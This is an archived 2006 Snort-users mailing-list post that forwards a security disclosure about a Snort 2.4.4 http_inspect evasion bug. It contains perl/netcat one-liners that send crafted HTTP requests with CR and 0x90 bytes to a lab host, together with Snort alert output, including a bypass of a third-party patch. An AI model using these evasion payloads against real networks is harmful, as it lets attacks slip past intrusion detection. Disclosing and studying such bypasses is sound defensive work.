Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Snort-Users
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Snort-users] FW: [Dailydave] New Snort Bypass - Patch - Bypass of Patch

from [Paul Melson] Network Security [Permanent Link]
Subject: [Snort-users] FW: [Dailydave] New Snort Bypass - Patch - Bypass of Patch
Date: Fri, 2 Jun 2006 11:03:11 -0400 
FYI in case you didn't catch this on the other lists it was posted to.

PaulM 

-----Original Message-----
From: Sigint Consulting [mailto:info@sigint-consulting.com] 
Sent: Friday, June 02, 2006 1:27 AM
To: dailydave@lists.immunitysec.com
Cc: bugtraq@securityfocus.com
Subject: [Dailydave] New Snort Bypass - Patch - Bypass of Patch

There was a Snort evasion bug posted on BugTraq today
http://www.securityfocus.com/archive/1/435600/30/0/threaded

This attack will not show up in alert file at all perl -e 'print "GET
\x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

Notice the \x0d CR character (\r) above.

The following will show up in alert as 'BARE BYTE UNICODE ENCODING'
perl -e 'print "GET \x90\x90 http/1.0\r\n\r\n"'|nc 192.168.1.3 80 Notice no
\x0d CR character above.

We have confirmed it on a Debian box, Snort 2.4.4 Build 28. I have applied
the Demarc patch found here
http://www.demarc.com/files/patch_20060531/snort-2.4.4-demarc-patch.diff

There patch appears to work at first glance generating this error in
'alert':

[**] [119:2:1] (http_inspect) DOUBLE DECODING ATTACK [**]
06/03-15:19:04.185301 192.168.1.4:58107 -> 192.168.1.3:80 TCP TTL:64 TOS:0x0
ID:13064 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0x306F2919  Ack: 0x40DA48CC  Win: 0x5B4  TcpLen: 32 TCP
Options (3) => NOP NOP TS: 21436964 36363323

However we can once again bypass this by including our CR character before
our string like so:

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
192.168.1.3 80

No alert is generated from the string above.

If we change the above to not include the \x0d CR character snort with the
demarc patch will generate an error:

perl -e 'print "GET /index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80

[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]
06/03-15:21:50.872878 192.168.1.4:58117 -> 192.168.1.3:80 TCP TTL:64 TOS:0x0
ID:33947 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x3A1121F3  Ack: 0x4ADDCB4A  Win: 0x5B4  TcpLen: 32 TCP
Options (3) => NOP NOP TS: 21603698 36530036

(notice the error is BARE BYTE UNICODE ENCODING not DOUBLE DECODING
ATTACK)

We are not sure how much this may buy an attacker as the CR character may
mess up any requests to the webserver, further research is needed on this.
As the Demarc advisory states there may be more impacts to this bug that
will come out in time. Kudos to Demarc for finding this bug.

Chris
www.sigint-consulting.com
info@sigint-consulting.com






_______________________________________________
Snort-users mailing list
Snort-users@lists.sourceforge.net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Snort-users] FW: [Dailydave] New Snort Bypass - Patch - Bypass of Patch, Paul Melson <=
Previous by Date:  Re: [Snort-users] Slow custom preprocessor, snort user
Next by Date:  [Snort-users] Snort frustration, Humes, David G.
Previous by Thread:  [Snort-users] Slow custom preprocessor, Sanjai Narain
Next by Thread:  [Snort-users] Snort frustration, Humes, David G.
Indexes:  [Date] [Thread] [Top] [All Lists]